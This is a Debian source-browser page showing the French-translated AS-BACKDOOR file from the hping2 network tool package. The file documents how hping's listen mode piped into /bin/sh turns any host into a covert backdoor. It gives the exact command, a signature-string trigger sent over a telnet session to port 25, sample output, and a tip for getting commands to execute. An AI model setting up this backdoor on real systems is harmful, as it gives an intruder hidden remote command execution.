File: AS-BACKDOOR

package info (click to toggle)
hping2 2.rc3-3
  • links: PTS
  • area: main
  • in suites: sarge
  • size: 756 kB
  • ctags: 951
  • sloc: ansic: 6,706; makefile: 110; sh: 83
file content (37 lines) | stat: -rw-r--r-- 1,323 bytes parent folder | download | duplicates (11)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
hping peut tre utilis comme une backdoor (ndt : porte drobe). Essayez
juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh :

Mettez hping en mode listen (ndt : d'coute) sur le systme victime.

victim# hping -I eth0 -9 mysign | /bin/sh

Chaque paquet qui contient "mysign" sera trait par hping, tous les octets
qui suivent "mysign" dans les paquets seront envoys dans la sortie
standard, ainsi par exemple je serai capable d'excuter des commandes en
utilisant tous types de protocoles. Juste pour exemple je peux utiliser le
dmon smtpd pour excuter 'ls' sur la victime.

evil$ telnet victim 25

Trying 192.168.1.1...
Connected to nano (192.168.1.1).
Escape character is '^]'.
220 nano.marmoc.net ESMTP Sendmail
mysignls;

sur la victime vous verrez :

victim# hping -I eth0 -9 mysign | /bin/sh
hping2 listen mode
bin   cdrom  etc     home  local-home  mnt   root  tmp  var
boot  dev    export  lib   lost+found  proc  sbin  usr
: command not found

Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra
juste ls^M. Le ";" force l'excution de la commande (du moins avec bash et
zsh, vrifiez votre shell pour plus d'informations).

Ceci fonctionne avec tous les types de paquets IP valides non filtrs, le
niveau suprieur de protocole importe peu.

antirez <antirez@invece.org>